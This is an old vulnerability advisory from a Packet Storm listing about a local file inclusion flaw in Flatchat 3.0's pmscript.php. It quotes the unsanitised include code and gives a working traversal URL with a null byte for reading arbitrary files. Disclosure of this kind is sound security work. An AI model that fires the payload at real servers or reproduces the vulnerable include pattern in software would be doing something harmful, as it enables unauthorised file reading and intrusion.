Flatchat 3.0 Local File Inclusion

2009-04-28T00:00:00
ID PACKETSTORM:77014
Type packetstorm
Reporter SirGod
Modified 2009-04-28T00:00:00

Description

                                        
                                            `##########################################################################################  
[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability  
[+] Discovered By SirGod  
[+] www.mortal-team.net  
[+] www.h4cky0u.org  
##########################################################################################  
  
[+] Homepage : http://ninjadesigns.co.uk/  
  
[+] Local File Inclusion  
  
- Vulnerable code in pmscript.php  
  
--------------------------------------------  
$filename = 'users/'.$_GET['with'].'.php';  
  
if (file_exists($filename)) {  
include($filename);  
--------------------------------------------  
  
  
http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00  
  
##########################################################################################  
  
  
`